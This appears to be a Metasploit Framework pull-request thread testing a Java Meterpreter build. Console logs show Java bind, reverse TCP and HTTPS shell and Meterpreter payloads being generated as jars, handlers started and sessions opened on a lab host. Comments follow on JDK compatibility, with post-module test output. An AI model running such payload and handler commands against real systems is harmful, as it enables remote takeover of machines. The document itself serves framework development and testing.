WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] https://172.16.199.158:8443 handling request from 172.16.199.158; (UUID: vn4qvicn) Staging java payload (61016 bytes) ...
[!] https://172.16.199.158:8443 handling request from 172.16.199.158; (UUID: vn4qvicn) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 2 opened (172.16.199.158:8443 -> 172.16.199.158:47090) at 2023-10-03 11:19:53 -0800

msf6 payload(java/meterpreter/reverse_https) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
shellComputer        : ubuntu
OS              : Linux 5.15.0-84-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > shell
Process 1 created.
Channel 1 created.
java -version
openjdk version "17.0.8.1" 2023-08-24
OpenJDK Runtime Environment (build 17.0.8.1+1-Ubuntu-0ubuntu120.04)
OpenJDK 64-Bit Server VM (build 17.0.8.1+1-Ubuntu-0ubuntu120.04, mixed mode, sharing)
```

java/shell/bind_tcp

```
msf6 payload(java/shell/bind_tcp) > options

Module options (payload/java/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address


View the full module info with the info, or info -d command.

msf6 payload(java/shell/bind_tcp) > set rhost 172.16.199.158
rhost => 172.16.199.158
msf6 payload(java/shell/bind_tcp) > generate -o child-process-rb-java-shell-bind-tcp20230512-2596-t5xc7u.jar-2596-t5xc7u.jar -f jar AutoVerifySessionTimeout=10 spawn=0 lport=4444 rhost=172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5680 bytes to child-process-rb-java-shell-bind-tcp20230512-2596-t5xc7u.jar-2596-t5xc7u.jar...
msf6 payload(java/shell/bind_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 3

[*] Started bind TCP handler against 172.16.199.158:4444
msf6 payload(java/shell/bind_tcp) > WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
[*] Sending stage (3097 bytes) to 172.16.199.158
[*] Command shell session 4 opened (172.16.199.158:40727 -> 172.16.199.158:4444) at 2023-10-02 16:40:20 -0800

msf6 payload(java/shell/bind_tcp) > sessions -i 4
[*] Starting interaction with 4...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
uname -a
Linux ubuntu 5.15.0-84-generic #93~20.04.1-Ubuntu SMP Wed Sep 6 16:15:40 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
```

java/shell/reverse_tcp       

```
msf6 payload(java/shell/bind_tcp) > use java/shell/reverse_tcp
msf6 payload(java/shell/reverse_tcp) > options

Module options (payload/java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(java/shell/reverse_tcp) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/shell/reverse_tcp) > generate -o child-process-rb-java-shell-reverse-tcp.jar -f jar AutoVerifySessionTimeout=10 spawn=0 lport=4444 lhost=172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5701 bytes to child-process-rb-java-shell-reverse-tcp.jar...
msf6 payload(java/shell/reverse_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 4

[*] Started reverse TCP handler on 172.16.199.158:4444
msf6 payload(java/shell/reverse_tcp) > WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
[*] Sending stage (3097 bytes) to 172.16.199.158
[*] Command shell session 5 opened (172.16.199.158:4444 -> 172.16.199.158:50914) at 2023-10-02 16:44:54 -0800

msf6 payload(java/shell/reverse_tcp) > sessions -i 5
[*] Starting interaction with 5...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
uname -a
Linux ubuntu 5.15.0-84-generic #93~20.04.1-Ubuntu SMP Wed Sep 6 16:15:40 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

```

 java/shell_reverse_tcp

```


msf6 payload(java/shell_reverse_tcp) > options

Module options (payload/java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4445             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(java/shell_reverse_tcp) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/shell_reverse_tcp) > generate -o child-process-rb-java-shell-reverse-stageless-tcp.jar -f jar AutoVerifySessionTimeout=10 spawn=0 lport=4445 lhost=172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/metasploit/Payload.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/metasploit/Payload.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
[*] Writing 8051 bytes to child-process-rb-java-shell-reverse-stageless-tcp.jar...
msf6 payload(java/shell_reverse_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/metasploit/Payload.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
[*] Payload Handler Started as Job 6

[*] Started reverse TCP handler on 172.16.199.158:4445
msf6 payload(java/shell_reverse_tcp) > [*] Command shell session 6 opened (172.16.199.158:4445 -> 172.16.199.158:40778) at 2023-10-02 16:49:50 -0800

msf6 payload(java/shell_reverse_tcp) > sessions -i 6
[*] Starting interaction with 6...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
uname -a
Linux ubuntu 5.15.0-84-generic #93~20.04.1-Ubuntu SMP Wed Sep 6 16:15:40 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

```

#### Open JDK 1.8 (build 1.8.0_43-b03)

java/meterpreter/bind_tcp

```
msf6 > use  java/meterpreter/bind_tcp
msf6 payload(java/meterpreter/bind_tcp) > options

Module options (payload/java/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address


View the full module info with the info, or info -d command.

msf6 payload(java/meterpreter/bind_tcp) > set rhost 172.16.199.158
rhost => 172.16.199.158
msf6 payload(java/meterpreter/bind_tcp) > generate -o child-process-rb-java-1-8-meterpreter-bind-tcp.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5680 bytes to child-process-rb-java-1-8-meterpreter-bind-tcp.jar...
msf6 payload(java/meterpreter/bind_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 0

[*] Started bind TCP handler against 172.16.199.158:4444
msf6 payload(java/meterpreter/bind_tcp) > WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] Sending stage (60483 bytes) to 172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 1 opened (172.16.199.158:42493 -> 172.16.199.158:4444) at 2023-10-03 10:05:49 -0800

msf6 payload(java/meterpreter/bind_tcp) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-84-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.158 - Meterpreter session 1 closed.  Reason: User exit
```

java/meterpreter/reverse_tcp

```
msf6 > use java/meterpreter/reverse_tcp
msf6 payload(java/meterpreter/reverse_tcp) > generate -o child-process-rb-java-1-8-meterpreter-reverse-tcp.jar -f jar
[-] Payload generation failed: One or more options failed to validate: LHOST.
msf6 payload(java/meterpreter/reverse_tcp) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/meterpreter/reverse_tcp) > generate -o child-process-rb-java-1-8-meterpreter-reverse-tcp.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5701 bytes to child-process-rb-java-1-8-meterpreter-reverse-tcp.jar...
msf6 payload(java/meterpreter/reverse_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 172.16.199.158:4444
msf6 payload(java/meterpreter/reverse_tcp) > WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] Sending stage (60483 bytes) to 172.16.199.158
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 2 opened (172.16.199.158:4444 -> 172.16.199.158:54106) at 2023-10-03 10:08:49 -0800

msf6 payload(java/meterpreter/reverse_tcp) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-84-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.199.158 - Meterpreter session 2 closed.  Reason: Died
```

java/meterpreter/reverse_http

```
msf6 > use java/meterpreter/reverse_http
msf6 payload(java/meterpreter/reverse_http) > options

Module options (payload/java/meterpreter/reverse_http):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8080             yes       The local listener port
   LURI                    no        The HTTP Path


View the full module info with the info, or info -d command.

msf6 payload(java/meterpreter/reverse_http) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/meterpreter/reverse_http) > generate -o child-process-rb-java-1-8-meterpreter-http.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 6003 bytes to child-process-rb-java-1-8-meterpreter-http.jar...
msf6 payload(java/meterpreter/reverse_http) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 3

[*] Started HTTP reverse handler on http://172.16.199.158:8080
msf6 payload(java/meterpreter/reverse_http) > [!] http://172.16.199.158:8080 handling request from 172.16.199.158; (UUID: two7iowu) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] http://172.16.199.158:8080 handling request from 172.16.199.158; (UUID: two7iowu) Staging java payload (61016 bytes) ...
[!] http://172.16.199.158:8080 handling request from 172.16.199.158; (UUID: two7iowu) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 4 opened (172.16.199.158:8080 -> 172.16.199.158:56752) at 2023-10-03 10:56:12 -0800

msf6 payload(java/meterpreter/reverse_http) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: msfuser
meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-84-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
```

java/meterpreter/reverse_https

```
msf6 > use java/meterpreter/reverse_https
msf6 payload(java/meterpreter/reverse_https) > options

Module options (payload/java/meterpreter/reverse_https):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The local listener hostname
   LPORT  8443             yes       The local listener port
   LURI                    no        The HTTP Path


View the full module info with the info, or info -d command.

msf6 payload(java/meterpreter/reverse_https) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/meterpreter/reverse_https) > generate -o child-process-rb-java-1-8-meterpreter-https.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 6845 bytes to child-process-rb-java-1-8-meterpreter-https.jar...
msf6 payload(java/meterpreter/reverse_https) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 4
msf6 payload(java/meterpreter/reverse_https) >
[*] Started HTTPS reverse handler on https://172.16.199.158:8443
[!] https://172.16.199.158:8443 handling request from 172.16.199.158; (UUID: 0famte62) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/meterpreter.jar is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Meterpreter.class is being used
[*] https://172.16.199.158:8443 handling request from 172.16.199.158; (UUID: 0famte62) Staging java payload (61016 bytes) ...
[!] https://172.16.199.158:8443 handling request from 172.16.199.158; (UUID: 0famte62) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/msfuser/git/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
[*] Meterpreter session 5 opened (172.16.199.158:8443 -> 172.16.199.158:38026) at 2023-10-03 10:57:52 -0800

msf6 payload(java/meterpreter/reverse_https) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : ubuntu
OS              : Linux 5.15.0-84-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
meterpreter > getuid
Server username: msfuser
```

java/shell/bind_tcp

```
msf6 > use java/shell/bind_tcp
msf6 payload(java/shell/bind_tcp) > set rhost 172.16.199.158
rhost => 172.16.199.158
msf6 payload(java/shell/bind_tcp) > options

Module options (payload/java/shell/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.16.199.158   no        The target address


View the full module info with the info, or info -d command.

msf6 payload(java/shell/bind_tcp) > generate -o child-process-rb-java-1-8-shell-bind-tcp.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5680 bytes to child-process-rb-java-1-8-shell-bind-tcp.jar...
msf6 payload(java/shell/bind_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 0

[*] Started bind TCP handler against 172.16.199.158:4444
msf6 payload(java/shell/bind_tcp) > WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
[*] Sending stage (3097 bytes) to 172.16.199.158
[*] Command shell session 1 opened (172.16.199.158:39887 -> 172.16.199.158:4444) at 2023-10-03 10:43:12 -0800

msf6 payload(java/shell/bind_tcp) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
uname -a
Linux ubuntu 5.15.0-84-generic #93~20.04.1-Ubuntu SMP Wed Sep 6 16:15:40 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
java -version
openjdk version "1.8.0_43"
OpenJDK Runtime Environment (build 1.8.0_43-b03)
OpenJDK 64-Bit Server VM (build 25.40-b25, mixed mode)
```


java/shell/reverse_tcp

```
msf6 payload(java/shell/bind_tcp) > use  java/shell/reverse_tcp
msf6 payload(java/shell/reverse_tcp) > options

Module options (payload/java/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(java/shell/reverse_tcp) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/shell/reverse_tcp) > generate -o child-process-rb-java-1-8-shell-revers_tcp.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Writing 5701 bytes to child-process-rb-java-1-8-shell-revers_tcp.jar...
msf6 payload(java/shell/reverse_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java is being used
[*] Payload Handler Started as Job 1

[*] Started reverse TCP handler on 172.16.199.158:4444
msf6 payload(java/shell/reverse_tcp) > WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
[*] Sending stage (3097 bytes) to 172.16.199.158

msf6 payload(java/shell/reverse_tcp) > se[*] Command shell session 2 opened (172.16.199.158:4444 -> 172.16.199.158:38620) at 2023-10-03 10:49:15 -0800

[-] Unknown command: s
msf6 payload(java/shell/reverse_tcp) > sessions -i 2
[*] Starting interaction with 2...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
uname -a
Linux ubuntu 5.15.0-84-generic #93~20.04.1-Ubuntu SMP Wed Sep 6 16:15:40 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
java -version
openjdk version "1.8.0_43"
OpenJDK Runtime Environment (build 1.8.0_43-b03)
OpenJDK 64-Bit Server VM (build 25.40-b25, mixed mode)
```


 java/shell_reverse_tcp 

```
msf6 > use  java/shell_reverse_tcp
msf6 payload(java/shell_reverse_tcp) > options

Module options (payload/java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(java/shell_reverse_tcp) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf6 payload(java/shell_reverse_tcp) > generate -o child-process-rb-java-1-8-shell-reverse-stageless_tcp.jar -f jar
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/metasploit/Payload.class is being used
WARNING: Local files may be incompatible with the Metasploit Framework
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/metasploit/Payload.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
[*] Writing 8051 bytes to child-process-rb-java-1-8-shell-reverse-stageless_tcp.jar...
msf6 payload(java/shell_reverse_tcp) > to_handler
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/metasploit/Payload.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Stage.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/StreamForwarder.class is being used
WARNING: Local file /home/msfuser/git/metasploit-framework/data/java/javapayload/stage/Shell.class is being used
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 172.16.199.158:4444
msf6 payload(java/shell_reverse_tcp) > [*] Command shell session 1 opened (172.16.199.158:4444 -> 172.16.199.158:53824) at 2023-10-03 12:24:30 -0800

msf6 payload(java/shell_reverse_tcp) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfuser) gid=1000(msfuser) groups=1000(msfuser),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare),998(docker),1001(rvm)
uname -a
Linux ubuntu 5.15.0-84-generic #93~20.04.1-Ubuntu SMP Wed Sep 6 16:15:40 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
java -version
openjdk version "1.8.0_43"
OpenJDK Runtime Environment (build 1.8.0_43-b03)
OpenJDK 64-Bit Server VM (build 25.40-b25, mixed mode)
```

</p>

</details>

**Comment by schierlm** [comment]
About testing:

**Testing compilation**

I don't think there is any need to test compilation on older JDKs than 1.8. In practice, Rapid7 will compile it with some JDK and ship the compiled classes in the Rubygem. So it has to work on the version Rapid7 currently uses and probably on any newer ones they may use.

If you want to compile it with older JDKs, you'd have to use an older Maven version (and older Maven plugins). You can only get down to 1.4 that way, though. Or you configure your Maven setup to run on one Java version but invoke the compiler of an older Java version. But I don't think this is necessary, since each JDK can also target older versions of the Java platform (Java 1.8 can target down to 1.1, and as you discovered 17 can target down to 1.7). And as long as there are no features used by Meterpreter that did not exist in Java 1.8 yet (Foreign Function and Memory API did not make it into Java 21 proper, only as "Preview", and I cannot think of any other new Java features that would create benefit for Meterpreter).

**Testing execution**

It definitely makes sense to test execution of the new Meterpreter on different Java versions/vendors.

Up to the release of Java 1.8, OpenJDK did not exist; people used proprietary JDKs from Sun (later acquired by Oracle) or (for non-Windows architectures) IBM, or (for their Macs) Apple. There were also JDKs from mobile phone manufacturers like Nokia, Siemens, SonyEricsson, but they targeted a limited version of the API which did not include direct TCP/IP socket access, so Meterpreter won't run there anyway. And Gemalto SDK for their Java smart cards (also no target for Meterpreter since smart cards do not even have a TCP/IP stack).

You can get old Oracle JDK versions from their (Java Archive)[https://www.oracle.com/java/technologies/downloads/archive/] page (you will need a free Oracle Developer Account for downloading them). IBM also has a similar download page, and Apple mostly included them with their operating systems. (Microsoft Java was also a thing, but it stopped being developed at Java 1.1 and the last version that could really use it was Windows XP).


OpenJDK was created by Oracle by taking some of the parts of their Java 7 and Java 8 and combine it with other open source libraries (image and font handling, cryptography, ...) and released it as OpenJDK. Nobody whose business depended on Java used OpenJDK 7 or 8 at that time. Open Source purists would probably rather use GNU Classpath anyway. That obviously changed once OpenJDK 9 was released and all Java 9 implementations were based on OpenJDK 9.


TL;DR: If you want to test older versions, I would test it on a few Oracle JDK releases on Windows and Linux, and if you want to, you could also test on GNU Classpath and IBM JDK on Linux. (Probably some parts did not work there on the old Meterpreter either, so it's more of a "regressions test").

**Comment by smashery** [comment]
Thanks @jheysel-r7. Yeah, I remember having those same compilation issues at one point. I'm trying to remember exactly what resolved it; I think it was just the right versions of everything (Java 1.8 - I just followed the README.md in the `java` directory).

**Comment by sjanusz-r7** [comment]
I've tested this on Kali Linux using the IBM JDK versions `ibm64-1.8.0.381` (Java 8) and `semeru64-20.0.2` (Java 20) that I downloaded from IBM. I've ran the `test/all` post module after generating a master and PR branch Meterpreter jar files:

## IBM Java 8
### Master Branch
<details>

```ruby
[*] Applicable modules:
Valid modules for java/linux session 1
======================================

 #   Name                          is_session_platform  is_session_type
 -   ----                          -------------------  ---------------
 0   test/unix                     Yes                  Yes
 1   test/railgun_reverse_lookups  Yes                  Yes
 2   test/search                   Yes                  Yes
 3   test/cmd_exec                 Yes                  Yes
 4   test/file                     Yes                  Yes
 5   test/get_env                  Yes                  Yes
 6   test/meterpreter              Yes                  Yes
 7   test/railgun                  Yes                  Yes
 8   test/extapi                   No                   Yes
 9   test/services                 No                   Yes
 10  test/registry                 No                   Yes

[*] Running test/cmd_exec against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should return the result of echo with single quotes
[+] should return the result of echo with double quotes
[+] should return the stderr output
[+] should return the result of echo
[+] should return the full response after sleeping
[+] should return the full response after sleeping
[+] should return the result of echo 10 times
[*] Passed: 7; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/file against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should expand home
[+] should not expand non-isolated tilde
[+] should not expand mid-string tilde
[+] should not expand env vars with invalid naming
[+] should expand multiple variables
[+] should test for directory existence
[+] should create directories
[+] should list the directory we just made
[+] should recursively delete the directory we just made
[+] should delete a symbolic link target
[+] should not recurse into symbolic link directories
[+] should test for file existence
[+] should create text files
[+] should read the text we just wrote
[+] should append text files
[+] should delete text files
[+] should move files
[+] should write binary data
[+] should read the binary data we just wrote
[+] should delete binary files
[+] should append binary data
[*] Passed: 21; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/get_env against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should return user
[+] should handle $ sign
[+] should return multiple envs
[*] Passed: 3; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/meterpreter against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0; Skipped: 0
[*] --------------------------------------------------------------------------------
[*] Running test/railgun against session -1
[*] --------------------------------------------------------------------------------
[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_fs_chmod, stdapi_railgun_api, stdapi_railgun_memread
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[*] SKIPPED: def test_api_function_calls_libc (session does not support COMMAND_ID_STDAPI_RAILGUN_API)
[*] SKIPPED: def test_api_function_calls_windows (session platform is not windows)
[*] SKIPPED: def test_api_function_file_info_windows (session platform is not windows)
[*] Passed: 3; Failed: 0; Skipped: 3
[*] --------------------------------------------------------------------------------
[*] Running test/railgun_reverse_lookups against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[*] SKIPPED: def test_osx_static (session platform is not osx)
[*] SKIPPED: def test_linux_static (session does not support COMMAND_ID_STDAPI_RAILGUN_API)
[*] SKIPPED: def test_windows_static (session platform is not windows)
[*] SKIPPED: def test_windows_datastore (session platform is not windows)
[*] Passed: 4; Failed: 0; Skipped: 4
[*] --------------------------------------------------------------------------------
[*] Running test/search against session -1
[*] --------------------------------------------------------------------------------
[*] Running against session -1
[*] Session type is meterpreter and platform is linux
[+] should search for new files
[+] should search recursively for files
[+] should search with globs for files
[+] should search with globs ignoring files
[+] should search with dates for files
[+] should search with dates ignores new files
[+] should search with dates ignores old files
